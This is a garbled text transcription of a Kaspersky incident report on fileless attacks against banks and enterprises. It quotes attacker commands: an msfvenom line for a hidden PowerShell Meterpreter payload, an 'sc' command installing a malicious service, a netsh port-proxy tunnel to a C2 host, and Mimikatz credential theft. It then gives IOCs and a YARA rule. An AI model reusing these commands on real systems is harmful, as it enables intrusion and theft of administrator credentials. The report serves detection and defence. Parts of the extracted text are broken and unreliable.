Transcription
Kaspersky Enterprise CybersecurityFileless attacks againstenterprise networkswww.kaspersky.com#truecybersecurity
Fileless attacks againstenterprise networksDuring incident response, a team of security specialists needs to follow the artefacts thatattackers have left in the network. Artefacts are stored in logs, memories and hard drives.Unfortunately, each of these storage media has a limited timeframe when the required data isavailable. One reboot of an attacked computer will make memory acquisition useless. Severalmonths after an attack the analysis of logs becomes a gamble because they are rotated overtime. Hard drives store a lot of needed data and, depending on its activity, forensic specialistsmay extract data up to a year after an incident. That’s why attackers are using anti-forensictechniques (or simply SDELETE) and memory-based malware to hide their activity duringdata acquisition. A good example of the implementation of such techniques is Duqu2. Afterdropping on the hard drive and starting its malicious MSI package it removes the packagefrom the hard drive with file renaming and leaves part of itself in the memory with a payload.That’s why memory forensics is critical to the analysis of malware and its functions. Anotherimportant part of an attack are the tunnels that are going to be installed in the network byattackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 useda special driver for that. Now you may understand why we were very excited and impressedwhen, during an incident response, we found that memory-based malware and tunnellingwere implemented by attackers using Windows standard utilities like “SC” and MAbgBGADQASABEAHEAWgB4AEMARQBtAFQAcwBJAG This thread was originally discovered by a bank’s securityteam, after detecting Meterpreter code inside thephysical memory of a domain controller (DC).Kaspersky Lab’s product detection names for suchkinds of thread are MEM:Trojan.Win32.Cometerand MEM:Trojan.Win32.Metasploit. Kaspersky Labparticipated in the forensic analysis after this attackwas detected, discovering the use of PowerShellscripts within the Windows registry. Additionally it wasdiscovered that the NETSH utility as used for tunnellingtraffic from the victim’s host to the attacker s C2.This script allocates memory, resolves WinAPIs anddownloads the Meterpreter utility directly to RAM.These kind of scripts may be generated by usingthe Metasploit Msfvenom utility with the followingcommand line options:We know that the Metasploit framework wasused to generate scripts like the following one: msfvenom -p windows/meterpreter/bindhidden tcp AHOST 10.10.1.11 -f psh-cmd%COMSPEC% /b /c start /b /min powershell.exe-nop -w hidden -e QAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAaAfter the successful generation of a script, theattackers used the SC utility to install a maliciousservice (that will execute the previous script) on thetarget host. This can be done, for example, usingthe following command: sc \\target name create ATITscUAbinpath “C:\Windows\system32\cmd.exe/b /c start /b /min powershell.exe -nop-w hidden e aQBmACgAWwBJAG4AdABQAHQA ”start manualThe next step after installing the malicious servicewould be to set up tunnels to access to the infectedmachine from remote hosts, for example using thefollowing command:1
Over 140 enterprises hit around the world, includingbanks, telecoms and government organizationsTarget’s servers arehacked using a knownexploit for anunpatched vulnerabilityAttackers combine & adaptwell-known tools Meterpreter, PowerShellscripts - to infect computer1Use standard utilities (NETSH) for tunnelto C2 server – providing attackers withremote accessNearly all tracesdisappear onreboot4Code hides in the memory – Windows registryNo malware files on hard drive‘Invisible’ to security whitelistsGathers info – e.g. passwords of system administrators25?Lack of malware artefactsmakes detection andinvestigation difficult36 2017 AO Kaspersky Lab. All Rights Reserved. netsh interface portproxy add v4tov4listenport 4444 connectaddress 10.10.1.12connectport 8080 listenaddress 0.0.0.0Resulting in the following payload:That would result in all network traffic from10.10.1.11:4444 being forwarded to 10.10.1.12:8080.This technique of setting up proxy tunnels will providethe attackers with the ability to control any PowerShellinfected host from remote Internet hosts.The use of the “SC” and “NETSH” utilities requiresadministrator privileges both in local and remote host.The use of malicious PowerShell scripts also requiresprivilege escalation and execution policy changes. Inorder to achieve this, attackers used credentials fromService accounts with administrative privileges (forexample backup, service for remote task scheduler,etc.) grabbed by Mimikatz.FeaturesThe analysis of memory dumps and Windowsregistries from affected machines allowed usto restore both Meterpreter and Mimikatz. Thesetools were used to collect passwords of systemadministrators and for the remote administrationof infected hosts.Part of a code responsible for downloading Meterpreterfrom “adobeupdates.sytes[.]net”VictimsIn order to get the PowerShell payload used bythe attackers from the memory dumps, we usedthe following BASH commands:Using the Kaspersky Security Network we foundmore than 140 enterprise networks infected withmalicious PowerShell scripts in the registry. Theseare detected as Trojan.Multi.GenAutorunReg.c andHEUR:Trojan.Multi.Powecod.a. The table belowshow the number of infections per country. cat mal powershell.ps1 4 cut -f12 -d”“ base64 -di cut -f8 -d\’ base64-di zcat - cut -f2 -d\( cut -f2-d\” less grep \/ base64 -di hdHowever we cannot confirm that all of them wereinfected by the same attacker.2
The hidden-malware enterprise attacks:victim geographyOver 140 enterprises in 40 countries affectedEcuadorUSABrazilSpainUKFranceHit enterprises overnment organizations4Telecommunication companiesUgandaKenya4464A small number of infections have also beenfound in the following:59AustriaCyprusMadagascarSaudi ngoliaUkraineCambodiaIndonesiaMoroccoVatican City aguayVietnamCongoLibyaPeru86 2017 AO Kaspersky Lab. All Rights Reserved.AttributionAfter successful disinfection and cleaning, it is necessaryto change all passwords. This attack shows how nomalware samples are needed for successful exfiltrationof a network and how standard and open source utilitiesmake attribution almost impossible.During our analysis of the affected bank we learnedthat the attackers had used several third level domainsand domains in the .GA, .ML, .CF ccTLDs. The trick ofusing such domains is that they are free and missingWHOIS information after domain expiration. Giventhat the attackers used the Metasploit framework,standard Windows utilities and unknown domainswith no WHOIS information, this makes attributionalmost impossible. This closest groups with the sameTTPs are GCMAN and Carbanak.Further details of these attacks and their objectiveswill be presented at the Security Analyst Summit,to be held on St. Maarten from 2 to 6 April, 2017.For more information please iques like those described in this report arebecoming more common, especially against relevanttargets in the banking industry. Unfortunately theuse of common tools combined with different tricksmakes detection very hard.In fact, detection of this attack would be possiblein RAM, network and registry only. Please check theAppendix I - Indicators of Compromise section formore details on how to detect malicious activityrelated to this fileless PowerShell attack.3
Appendix I – Indicatorsof CompromiseTo find the host used by an attacker using thetechnique described for remote connections andpassword collection, the following paths in theWindows registry should be analyzed: HKLM\SYSTEM\ControlSet001\services\ - pathwill be modified after using the SC utility 4\tcp - path will be modifiedafter using the NETSH utilityIn unallocated space in the Windows registry, thefollowing artefacts might be found: powershell.exe -nop -w hidden -e 10.10.1.12/8080 10.10.1.11/4444Please note that these IPs are taken from the IR case inwhich we participated, so there could be any other IPused by an eventual attacker. These artefacts indicatethe use of PowerShell scripts as a malicious serviceand the use of the NETSH utility for building tunnels.Verdicts: MEM:Trojan.Win32.Cometer MEM:Trojan.Win32.Metasploit Trojan.Multi.GenAutorunReg.c HEUR:Trojan.Multi.PowecodAppendix II – Yara Rulesrule msf or tunnel in registry{strings: port number in registry “/4444” hidden powershell in registry “powershell.exe -nop -w hidden” widecondition:uint32(0) 0x66676572 and any ofthem}4
Kaspersky Lab, Moscow, Russia www.kaspersky.comAll about Internet security: www.securelist.comFind a partner near you: e www.kaspersky.com 2017 AO Kaspersky Lab. All rights reserved. Registered trademarks and servicemarks are the property of their respective owners.MachineLearningBig Data /Threat Intelligence
Target’s servers are hacked using a known exploit for an unpatched vulnerability Attackers combine & adapt well-known tools - Meterpreter, PowerShell scripts - to infect computer Code hides in the memory – Windows registry No malware files on hard drive ‘Invisible’ to security whitelists Gathers info – e.g. passwords of system administrators Use standard utilities (NETSH) for tunnel .
